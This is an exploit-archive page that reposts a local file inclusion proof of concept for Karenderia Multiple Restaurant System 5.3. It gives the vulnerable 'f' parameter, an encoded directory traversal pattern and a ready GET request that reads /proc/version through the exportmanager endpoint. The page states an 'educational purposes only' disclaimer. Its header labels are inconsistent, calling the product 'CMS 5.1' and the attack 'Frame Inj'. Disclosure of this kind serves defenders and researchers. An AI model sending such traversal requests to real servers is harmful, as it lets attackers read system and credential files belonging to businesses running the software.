Karenderia multiple restaurant system 5.3 local file inclusion Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-07-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Karenderia multiple restaurant system 5.3 local file inclusion is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
===========================================================================================
# Exploit Title: Karenderia CMS 5.1 - LFI Vuln.
# Dork: N/A
# Date: 04-07-2019
# Exploit Author: Mehmet EMIROGLU
# Software Link:
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - Frame Inj
# Parameters : f
# Attack Pattern :
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion
# GET Method :
http://localhost/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
===========================================================================================
Karenderia multiple restaurant system 5.3 local file inclusion